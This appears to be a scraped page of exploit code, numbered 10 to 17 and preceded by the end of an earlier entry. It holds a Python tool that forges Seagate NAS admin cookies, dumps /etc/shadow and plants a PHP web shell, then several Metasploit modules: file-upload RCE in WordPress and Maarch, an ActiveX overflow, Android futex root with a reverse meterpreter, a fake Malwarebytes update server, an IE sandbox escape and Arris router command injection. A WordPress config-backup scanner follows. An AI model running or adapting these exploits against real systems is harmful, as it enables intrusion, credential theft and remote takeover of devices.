XOR_KEY = '0f0a000d02011f0248000d290d0b0b0e03010e07' # This is the User agent we'll use for most of the requests DEFAULT_UA = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' # This is the description we're going to be reading from LFI_FILE = '/etc/devicedesc' # the base globals that will hold our state host = sys.argv[1] port = int(sys.argv[2]) cis = '' hostname = '' webshell = str(uuid.uuid1()) + ".php" def chunks(s, n): for i in xrange(0, len(s), n): yield s[i:i + n] def forward_interleave(a, : return ''.join(itertools.chain(*zip(itertools.cycle(a), )) def xor(s, k): return ''.join(chr(ord(a) ^ ord() for a, b in itertools.izip(s, itertools.cycle(k))) def sha1(s): return hashlib.sha1(s).hexdigest() def decode(s): f = xor(s, XOR_KEY) return ''.join(chr(ord(a) ^ ord() for a, b in chunks(f, 2)) def encode(s): s = forward_interleave(sha1(s), s) s = ''.join(a + chr(ord(a) ^ ord() for a, b in chunks(s, 2)) return xor(s, XOR_KEY) def make_request(uri = "/", ci_session = None, headers = None, post_data = None): method = 'GET' if not headers: headers = {} headers['Host'] = host if 'User-Agent' not in headers: headers['User-Agent'] = DEFAULT_UA if 'Accept' not in headers: headers['Accept'] = 'text/html' if post_data: method = 'POST' post_data = urllib.urlencode(post_data) headers['Content-Type'] = 'application/x-www-form-urlencoded' if ci_session: ci_session = urllib.quote(base64.b64encode(encode(ci_session))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) http = "" http += "{0} {1} HTTP/1.1\r\n".format(method, uri) for h in headers: http += "{0}: {1}\r\n".format(h, headers[h]) if post_data: http += "Content-Length: {0}\r\n".format(len(post_data)) http += "\r\n" if post_data: http += post_data s.send(http) result = "" while True: data = s.recv(1024) if not data: break result += data s.close() return result def 
get_ci_session(): resp = make_request() for l in resp.split("\r\n"): m = re.findall("Set-Cookie: ([a-zA-Z0-9_\-]+)=([a-zA-Z0-9\+%=/]+);", l) for name, value in m: if name == 'ci_session' and len(value) > 40: return decode(base64.b64decode(urllib.unquote(value))) print "Unable to establish session with {0}".format(host) sys.exit(1) def add_string(ci_session, key, value): prefix = 's:{0}:"{1}";s:'.format(len(key), key) if prefix in ci_session: ci_session = re.sub(r'{0}\d+:"[^"]*"'.format(prefix), '{0}{1}:"{2}"'.format(prefix, len(value), value), ci_session) else: # doesn't exist, so we need to add it to the start and the end. count = int(ci_session.split(':')[1]) + 1 ci_session = re.sub(r'a:\d+(.*)}$', r'a:{0}\1{1}{2}:"{3}";}}'.format(count, prefix, len(value), value), ci_session) return ci_session def set_admin(ci_session): return add_string(ci_session, "is_admin", "yes") def set_language(ci_session, lang): return add_string(ci_session, "language", lang) def include_file(ci_session, file_path): if file_path[0] == '/': file_path = '../../../../../..' 
+ file_path return set_language(ci_session, file_path + "\x00") def read_file(file_path, post_data = None): resp = make_request(ci_session = include_file(cis, file_path), headers = {}, post_data = post_data) return resp def hashdump(): shadow = read_file('/etc/shadow') for l in shadow.split("\n"): if l and ':!:' not in l and ':' not in l: parts = l.split(':') print "{0}:{1}".format(parts[0], parts[1]) def cmd(command): headers = { 'Content-Type' : 'application/x-www-form-urlencoded', 'Accept' : '*/*', 'User-Agent' : DEFAULT_UA } post_data = urllib.urlencode({'c' : command}) headers['Content-Type'] = 'application/x-www-form-urlencoded' ci_session = urllib.quote(base64.b64encode(encode(cis))) headers['Cookie'] = 'ci_session={0}'.format(ci_session) url = 'http://{0}:{1}/{2}'.format(host, port, webshell) req = urllib2.Request(url, headers = headers, data = post_data) return urllib2.urlopen(req).read() def shell(): running = True while running: c = raw_input("Shell ({0}) $ ".format(post_id)) if c != 'quit' and c != 'exit': cmd(c) else: running = False def show_admin_cookie(user_agent): ci_session = add_string(cis, 'is_admin', 'yes') ci_session = add_string(ci_session, 'username', 'admin') ci_session = add_string(ci_session, 'user_agent', user_agent) ci_session = urllib.quote(base64.b64encode(encode(ci_session))) print "Session cookies are bound to the browser's user agent." print "Using user agent: " + user_agent print "ci_session=" + ci_session def show_version(): print "Firmware Version: {0}".format(get_firmware_version()) def show_cookie(): print cis def show_help(): print "" print "Seagape v1.0 -- Interactive Seagate NAS Webshell" print " - OJ Reeves (@TheColonial) - https://beyondbinary.io/" print " - https://beyondbinary.io/bbsec/001" print "===========================================================================" print "version - Print the current firmware version to screen." print "dumpcookie - Print the current cookie to screen." 
print "admincookie <ua> - Create an admin login cookie (ua == user agent string)." print " Add to your browser and access ANY NAS box as admin." print "help - Show this help." print "exit / quit - Run for the hills." print "<anything else> - Execute the command on the server." print "" def execute(user_input): result = True parts = user_input.split(' ') c = parts[0] if c == 'admincookie': ua = DEFAULT_UA if len(parts) > 1: ua = ' '.join(parts[1:]) show_admin_cookie(ua) elif c == 'dumpcookie': show_cookie() elif c == 'version': show_version() elif c == 'help': show_help() elif c == 'quit' or c == 'exit': remove_shell() result = False else: print cmd(user_input) return result def get_firmware_version(): resp = make_request("/index.php/mv_system/get_firmware?_=1413463189043", ci_session = acis) return resp.replace("\r", "").replace("\n", "").split("version")[1][1:-2] def install_shell(): resp = make_request("/index.php/mv_system/get_general_setup?_=1413463189043", ci_session = acis) existing_setup = '' for l in resp.split("\r\n"): if 'general_setup' in l: existing_setup = l break # generate the shell and its installer exec_post = base64.b64encode("<?php if(isset($_POST['c'])&&!empty($_POST['c'])){system($_POST['c']);} ?>") installer = '<?php file_put_contents(\'{0}\', base64_decode(\'{1}\')); ?>'.format(webshell, exec_post) write_php = xml.sax.saxutils.quoteattr(installer)[1:-1] start = existing_setup.index('" description="') + 15 end = existing_setup.index('"', start) updated_setup = existing_setup[0:start] + write_php + existing_setup[end:] # write the shell to the description resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : updated_setup }) # invoke the installer read_file(LFI_FILE) # remove the installer resp = make_request("/index.php/mv_system/set_general_setup?_=1413463189043", ci_session = acis, headers = { }, post_data = { 'general_setup' : existing_setup }) def 
remove_shell(): return cmd('rm -f {0}'.format(webshell)) print "Establishing session with {0} ...".format(host) cis = get_ci_session() if len(sys.argv) >= 4 and sys.argv[3] == '-c': ua = DEFAULT_UA if len(sys.argv) > 4: ua = sys.argv[4] show_admin_cookie(ua) else: print "Configuring administrative access ..." acis = add_string(cis, 'is_admin', 'yes') acis = add_string(acis, 'username', 'admin') print "Installing web shell (takes a while) ..." install_shell() print "Extracting id and hostname ..." identity = cmd('whoami').strip() hostname = cmd('cat /etc/hostname').strip() show_help() running = True while running: try: user_input = raw_input("Seagape ({0}@{1})> ".format(identity, hostname)) running = execute(user_input) except: print "Something went wrong. Try again." Source
  10. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'socket' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::HTTP::Wordpress def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Holding Pattern Theme Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in all versions of the Holding Pattern theme found in the upload_file.php script which contains no session or file validation. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Borg', # Vulnerability disclosure 'Rob Carr <rob[at]rastating.com>' # Metasploit module ], 'References' => [ ['CVE', '2015-1172'], ['WPVDB', '7784'], ['URL', 'http://packetstormsecurity.com/files/130282/WordPress-Holding-Pattern-0.6-Shell-Upload.html'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['holding_pattern', {}]], 'DefaultTarget' => 0 )) end def rhost datastore['RHOST'] end def holding_pattern_uploads_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'uploads/') end def holding_pattern_uploader_url normalize_uri(wordpress_url_themes, 'holding_pattern', 'admin', 'upload-file.php') end def generate_mime_message(payload, payload_name) data = Rex::MIME::Message.new target_ip = IPSocket.getaddress(rhost) field_name = Rex::Text.md5(target_ip) data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 
'method' => 'POST', 'uri' => holding_pattern_uploader_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 payload_url = normalize_uri(holding_pattern_uploads_url, payload_name) print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(payload_name) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source
  11. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rh0', # vulnerability discovery and exploit, all the hard work 'juan vazquez' # msf module ], 'References' => [ ['EDB', '35948'], ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/'] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}", :os_name => OperatingSystems::Match::WINDOWS, :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0' }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 30 2015", 'DefaultTarget' => 0)) end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") case request.uri when /exploit.js/ print_status("Sending exploit.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, 
exploit_template(cli, target_info), headers) when /sprayer.js/ print_status("Sending sprayer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, sprayer_template(cli, target_info), headers) when /informer.js/ print_status("Sending informer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, informer_template(cli, target_info), headers) when /rop_builder.js/ print_status("Sending rop_builder.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, rop_builder_template(cli, target_info), headers) else print_status("Sending main.html...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'} send_exploit_html(cli, main_template(cli, target_info), headers) end end def main_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def exploit_template(cli, target_info) shellcode = Rex::Text.to_hex(get_payload(cli, target_info)) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def sprayer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def informer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def rop_builder_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js') 
template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def strip_comments(input) input.gsub(/\/\/.*$/, '') end end Source
  12. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'uri' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Maarch LetterBox 2.8 Unrestricted File Upload', 'Description' => %q{ This module exploits a file upload vulnerability on Maarch LetterBox 2.8 due to a lack of session and file validation in the file_to_index.php script. It allows unauthenticated users to upload files of any type and subsequently execute PHP scripts in the context of the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rob Carr <rob[at]rastating.com>' ], 'References' => [ ['CVE', '2015-1587'] ], 'DisclosureDate' => 'Feb 11 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Maarch LetterBox 2.8', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to Maarch LetterBox', '/']) ], self.class) end def letterbox_login_url normalize_uri(target_uri.path, 'login.php') end def letterbox_upload_url normalize_uri(target_uri.path, 'file_to_index.php') end def check res = send_request_cgi('method' => 'GET', 'uri' => letterbox_login_url) if res.nil? 
|| res.code != 200 return Msf::Exploit::CheckCode::Unknown elsif res.body.include?('alt="Maarch Maerys Archive v2.1 logo"') return Msf::Exploit::CheckCode::Appears end Msf::Exploit::CheckCode::Safe end def generate_mime_message(payload, name) data = Rex::MIME::Message.new data.add_part(payload.encoded, 'text/plain', 'binary', "form-data; name=\"file\"; filename=\"#{name}\"") data end def exploit print_status("#{peer} - Preparing payload...") payload_name = "#{Rex::Text.rand_text_alpha(10)}.php" data = generate_mime_message(payload, payload_name) print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'method' => 'POST', 'uri' => letterbox_upload_url, 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s ) fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 print_status("#{peer} - Parsing server response...") captures = res.body.match(/\[local_path\] => (.*\.php)/i).captures fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') if captures.nil? || captures[0].nil? payload_url = normalize_uri(target_uri.path, captures[0]) print_good("#{peer} - Response parsed successfully") print_status("#{peer} - Executing the payload at #{payload_url}") register_files_for_cleanup(File.basename(URI.parse(payload_url).path)) send_request_cgi({ 'uri' => payload_url, 'method' => 'GET' }, 5) end end Source
  13. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Common def initialize(info={}) super( update_info( info, { 'Name' => 'Android futex requeue kernel exploit', 'Description' => %q{ This module exploits a bug in futex_requeue in the linux kernel. Any android phone with a kernel built before June 2014 should be vulnerable. }, 'License' => MSF_LICENSE, 'Author' => [ 'Pinkie Pie', #discovery 'geohot', #towelroot 'timwr' #metasploit module ], 'References' => [ [ 'CVE', '2014-3153' ], [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ], [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ], ], 'SessionTypes' => [ 'meterpreter' ], 'Platform' => 'android', 'Targets' => [[ 'Automatic', { }]], 'Arch' => ARCH_DALVIK, 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, 'DefaultTarget' => 0 } )) register_options([ OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]), ], self.class) end def put_local_file(remotefile) localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" ) data = File.read(localfile, {:mode => 'rb'}) write_file(remotefile, data) end def exploit workingdir = session.fs.dir.getwd exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}" put_local_file(exploitfile) cmd_exec('/system/bin/chmod 700 ' + exploitfile) write_file(payloadfile, payload.raw) tmpdir = datastore['WritableDir'] rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}" rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar" 
rootcmd = " mkdir #{rootclassdir} && " rootcmd += "cd #{rootclassdir} && " rootcmd += "cp " + payloadfile + " #{rootpayload} && " rootcmd += "chmod 766 #{rootpayload} && " rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload" process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true}) process.channel.read end end Source
  14. import re , urllib2 , sys, urllib lista = [] backup = ['wp-config.php~','wp-config.php.bak','wp-config.bak','wp-config.php-bak','/wp-content/uploads/blog-backup.txt'] def unique(seq): seen = set() return [seen.add(x) or x for x in seq if x not in seen] def grabwp(ip): try: s = ip page = 1 print('\n') while page <= 21: bing = "http://www.bing.com/search?q=ip%3A"+s+"+?page_id=&count=50&first="+str(page) openbing = urllib2.urlopen(bing) readbing = openbing.read() findwebs = re.findall('<h2><a href="(.*?)"' , readbing) for i in range(len(findwebs)): wpnoclean = findwebs[i] findwp = re.findall('(.*?)\?page_id=', wpnoclean) lista.extend(findwp) page = page + 10 except IndexError: pass def searchbackup(site, config): try : read = urllib2.urlopen(site + "/" + config).read() rs = re.findall("USER",read) if rs : print "BACKUP FILE > " + site + "/" + config except : pass def scan(): final = unique(lista) for site in final : for config in backup : searchbackup(site, config) print "\!/ Server Wordpress Backup Files Scanner By YASSINOX.TN !/" print '' ip = raw_input("Server Ip Adress : ") grabwp(ip) final = unique(lista) print "Done ! Grabbed " + str(len(final) ) + " Wordpress Sites On This Server" print "---------------------------------------------------" scan() print "---------------------------------------------------"
  15. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer VERSION_REGEX = /\/v2\/(mbam|mbae)\/consumer\/version.chk/ EXE_REGEX = /\/v2\/(mbam|mbae)\/consumer\/data\/(mbam|mbae)-setup-(.*)\.exe/ NEXT_VERSION = { mbam: '2.0.3.1025', mbae: '1.04.1.1012' } def initialize(info = {}) super(update_info(info, 'Name' => 'Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution', 'Description' => %q{ This module exploits a vulnerability in the update functionality of Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes Anti-Exploit consumer 1.03.1.1220. Due to the lack of proper update package validation a man-in-the-middle attacker could execute arbitrary code by spoofing the update server data-cdn.mbamupdates.com and uploading an executable. This module has been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220. }, 'License' => MSF_LICENSE, 'Author' => [ 'Yonathan Klijnsma', # Vulnerability discovery and PoC 'Gabor Seljan', # Metasploit module 'todb' # Module refactoring ], 'References' => [ [ 'CVE', '2014-4936' ], [' OSVDB', '116050'], [ 'URL', 'http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and'] # Discoverer's blog ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Dec 16 2014', 'DefaultTarget' => 0 )) register_options( [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ]), OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]) ], self.class) # Vulnerable Malwarebytes clients do not allow altering these. 
deregister_options('SSL', 'SSLVersion', 'SSLCert') end def on_request_uri(cli, request) case request.uri when VERSION_REGEX serve_update_notice(cli) if set_exploit_target($1, request) when EXE_REGEX serve_exploit(cli) else vprint_status "Sending empty page for #{request.uri}" serve_default_response(cli) end end def serve_default_response(cli) send_response(cli, '') end def check_client_version(request) return false unless request['User-Agent'] =~ /base:(\d+\.\d+\.\d+\.\d+)/ this_version = $1 next_version = NEXT_VERSION[:mbam] if Gem::Version.new(next_version) >= Gem::Version.new(this_version) return true else print_error "Version #{this_version} of Anti-Malware isn't vulnerable, not attempting update." return false end end def set_exploit_target(package, request) case package when /mbam/i if check_client_version(request) @client_software = ['Anti-Malware', NEXT_VERSION[:mbam]] else serve_default_response(cli) return false end when /mbae/i # We don't get identifying info from MBAE @client_software = ['Anti-Exploit', NEXT_VERSION[:mbae]] end end def serve_update_notice(cli) software,next_version = @client_software print_status "Updating #{software} to (fake) #{next_version}. The user may need to click 'OK'." send_response(cli, next_version, 'Content-Type' => 'application/octet-stream' ) end def serve_exploit(cli) print_status "Sending payload EXE..." send_response(cli, generate_payload_exe, 'Content-Type' => 'application/x-msdos-program' ) end end Source
  16. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Exploit::Powershell def initialize(info={}) super(update_info(info, { 'Name' => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape', 'Description' => %q{ This module abuses a process creation policy in Internet Explorer's sandbox, specifically the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape the Protected Mode, and execute code with Medium Integrity. At the moment, this module only bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # From Threat Intel of Symantec 'Henry Li', # Public vulnerability analysis 'juan vazquez' # Metasploit module ], 'Platform' => 'win', 'SessionTypes' => ['meterpreter'], 'Arch' => [ARCH_X86], 'DefaultOptions' => { 'EXITFUNC' => 'thread', 'WfsDelay' => 30 }, 'Targets' => [ [ 'Protected Mode (Windows 7) / 32 bits', { 'Arch' => ARCH_X86 } ] ], 'DefaultTarget' => 0, 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'References' => [ ['CVE', '2015-0016'], ['MSB', 'MS15-004'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/'] ], 'DisclosureDate' => 'Jan 13 2015' })) end def check temp = get_env('WINDIR') dll_path = "#{temp}\\System32\\TSWbPrxy.exe" win_ver = sysinfo['OS'] unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/ return Exploit::CheckCode::Safe end unless file_exist?(dll_path) return Exploit::CheckCode::Safe end Exploit::CheckCode::Detected end def exploit print_status('Checking target...') unless check == Exploit::CheckCode::Detected 
fail_with(Failure::NotVulnerable, 'System not vulnerable') end if session.platform !~ /^x86\// fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment') end win_ver = sysinfo['OS'] if win_ver =~ /Windows 2012|Windows 8/ fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment') end print_status('Checking the Process Integrity Level...') unless get_integrity_level == INTEGRITY_LEVEL_SID[:low] fail_with(Failure::NotVulnerable, 'Not running at Low Integrity') end cmd = cmd_psh_payload( payload.encoded, payload_instance.arch.first, { :remove_comspec => true } ) print_status('Storing payload on environment variable...') cmd.gsub!('powershell.exe ','') session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd) print_status('Exploiting...') temp = get_env('TEMP') # Using the old meterpreter loader, if it's loaded with # Reflective DLL Injection the exceptions in the sandbox # policy won't apply. session.core.load_library( 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'), 'TargetFilePath' => temp + '\\cve-2015-0016.dll', 'UploadLibrary' => true, 'Extension' => false, 'SaveToDisk' => false ) end def cleanup session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil) super end end Source
  17. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Arris VAP2500 tools_command.php Command Execution', 'Description' => %q{ Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username. }, 'Author' => [ 'HeadlessZeke' # Vulnerability discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8423'], ['CVE', '2014-8424'], ['OSVDB', '115045'], ['OSVDB', '115046'], ['BID', '71297'], ['BID', '71299'], ['URL', 'http://goto.fail/blog/2014/11/25/at-and-t-u-verse-vap2500-the-passwords-they-do-nothing/'] ], 'DisclosureDate' => 'Nov 25 2014', 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 1024, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet' } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DefaultTarget' => 0 )) end def check begin res = send_request_raw({ 'method' => 'GET', 'uri' => '/tools_command.php', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ return Exploit::CheckCode::Vulnerable end rescue ::Rex::ConnectionError return Exploit::CheckCode::Unknown end Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Trying to access the device ...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device") end print_status("#{peer} - Exploiting...") if datastore['PAYLOAD'] == 'cmd/unix/generic' exploit_cmd else exploit_session end end 
def exploit_cmd beg_boundary = rand_text_alpha(8) end_boundary = rand_text_alpha(8) begin res = send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "echo #{beg_boundary}; #{payload.encoded}; echo #{end_boundary}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }) if res && res.code == 200 && res.body.to_s =~ /TOOLS - COMMAND/ print_good("#{peer} - Command sent successfully") if res.body.to_s =~ /#{beg_boundary}(.*)#{end_boundary}/m print_status("#{peer} - Command output: #{$1}") end else fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end def exploit_session begin send_request_cgi({ 'uri' => normalize_uri('/', 'tools_command.php'), 'vars_post' => { 'cmb_header' => '', 'txt_command' => "#{payload.encoded}" }, 'method' => 'POST', 'cookie' => "p=#{Rex::Text.md5('super')}" }, 3) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end Source